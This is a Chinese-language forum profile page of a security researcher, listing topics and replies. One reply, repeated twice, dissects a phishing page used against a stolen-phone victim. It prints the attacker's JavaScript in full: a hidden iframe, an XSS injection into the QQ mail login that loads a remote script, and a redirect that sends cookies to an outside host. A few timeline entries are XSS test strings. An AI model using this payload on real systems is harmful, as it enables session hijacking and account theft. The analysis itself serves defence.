Evi1m0's recent timeline updates Evi1m0's recent timeline updates
http://www.google.com/aaa@test#xxx"xx><H1>x1
Oct 31, 2014
http://www.google.com/aaa@test#xxx"xxx
Oct 31, 2014
http://www.google.com/aaa@test#xxx
Oct 31, 2014
 |
Evi1m0V2EX member #61089, joined on 2014-04-24 13:39:16 +08:00 |
///////////////////////////////////////////////////////////////////////////////////////////////////rm-rf.gg
| Beehive v0.1.0 Release 信息安全 • Evi1m0 • Jul 31, 2015 • Lastly replied by Evi1m0 | 8 |
| 12306 售票网站新版验证码识别对抗
1 奇思妙想 • Evi1m0 • Mar 26, 2015 • Lastly replied by xlrtx
|
32 |
| [Sreg] Search Registration V1 版本发布 分享创造 • Evi1m0 • Mar 15, 2015 • Lastly replied by v2ex_user001 | 2 |
| test#aaa"test.com title test 沙盒 • Evi1m0 • Jun 10, 2015 • Lastly replied by Evi1m0 | 5 |
| Jinja2 2.0 /utils.py urlize vulnerability 信息安全 • Evi1m0 • Dec 11, 2015 • Lastly replied by Evi1m0 | 4 |
| 分享几个 Beebeeto 邀请码 信息安全 • Evi1m0 • Dec 11, 2015 • Lastly replied by sololivan | 30 |
Evi1m0's recent replies
Feb 22, 2018 Replied to a topic by Henryzhao › 全球工单系统 › 请求 Bilibili 开启二步认证 |
什么明文密码什么脱裤...怎么不动脑子的那么多?
题主提到的二步认证现在被小范围用于被风控的账号中,例如存在弱口令或撞库风险的账号。
题主提到的二步认证现在被小范围用于被风控的账号中,例如存在弱口令或撞库风险的账号。
Dec 11, 2015 Replied to a topic by Evi1m0 › 信息安全 › Jinja2 2.0 /utils.py urlize vulnerability |
<img src="test">
Dec 7, 2015 Replied to a topic by graetdk › 分享创造 › 第三方微博搜索 API 的想法 |
Nov 9, 2015 Replied to a topic by twoconk › 设计 › 新上线 web 站,求吐槽 |
Nov 2, 2015 Replied to a topic by saxon › 问与答 › 朋友 6S 被偷了,小偷(可能是团伙)发来链接偷取 APPLE ID |
Nov 2, 2015 Replied to a topic by saxon › 问与答 › 朋友 6S 被偷了,小偷(可能是团伙)发来链接偷取 APPLE ID |
嗯,刚才测试了一下,如果你的企业邮箱在登录情况下访问了如上网址,是可以登录你的邮箱。
Nov 2, 2015 Replied to a topic by saxon › 问与答 › 朋友 6S 被偷了,小偷(可能是团伙)发来链接偷取 APPLE ID |
@BOYPT
两个 iframe ,一些常见网站是人民网的分享接口进行的访问,不是攻击者。
另外一个 iframe 是进行攻击者的操作:
<iframe src="http://society.people.com.cn/n/2015/1031/c1008-27760163.html" style="width:100%;height:1200px;border:none"></iframe>
<iframe src="/htmlpage5.html" style="display:none"></iframe>
---------------
function test(PARAMS) {
var temp = document.createElement("form");
temp.acceptCharset = "utf-8";
//By Wfox
temp.action = 'http://m.exmail.qq.com/cgi-bin/login';
temp.method = "post";
temp.style.display = "none";
for (var x in PARAMS) {
var opt = document.createElement("textarea");
opt.name = x;
opt.value = PARAMS[x];
temp.appendChild(opt);
}
document.body.appendChild(temp);
temp.submit();
}
test({
uin: '\\"</script><script src=http://ryige.com/q/8></script>',
});
document.domain="qq.com";
window.onload=documentrrady;
function documentrrady(){
window.location.href="http://ryige.com/server/AddQQUser?c="+encodeURI(document.cookie)+"&u=lockKey8&r="+encodeURI(document.referrer)
};
两个 iframe ,一些常见网站是人民网的分享接口进行的访问,不是攻击者。
另外一个 iframe 是进行攻击者的操作:
<iframe src="http://society.people.com.cn/n/2015/1031/c1008-27760163.html" style="width:100%;height:1200px;border:none"></iframe>
<iframe src="/htmlpage5.html" style="display:none"></iframe>
---------------
function test(PARAMS) {
var temp = document.createElement("form");
temp.acceptCharset = "utf-8";
//By Wfox
temp.action = 'http://m.exmail.qq.com/cgi-bin/login';
temp.method = "post";
temp.style.display = "none";
for (var x in PARAMS) {
var opt = document.createElement("textarea");
opt.name = x;
opt.value = PARAMS[x];
temp.appendChild(opt);
}
document.body.appendChild(temp);
temp.submit();
}
test({
uin: '\\"</script><script src=http://ryige.com/q/8></script>',
});
document.domain="qq.com";
window.onload=documentrrady;
function documentrrady(){
window.location.href="http://ryige.com/server/AddQQUser?c="+encodeURI(document.cookie)+"&u=lockKey8&r="+encodeURI(document.referrer)
};
Aug 3, 2015 Replied to a topic by xiongbiao › 分享创造 › 用 Python 给 Linux 写了个键盘音效软件 - Tickeys - Linux |
nice
Select Language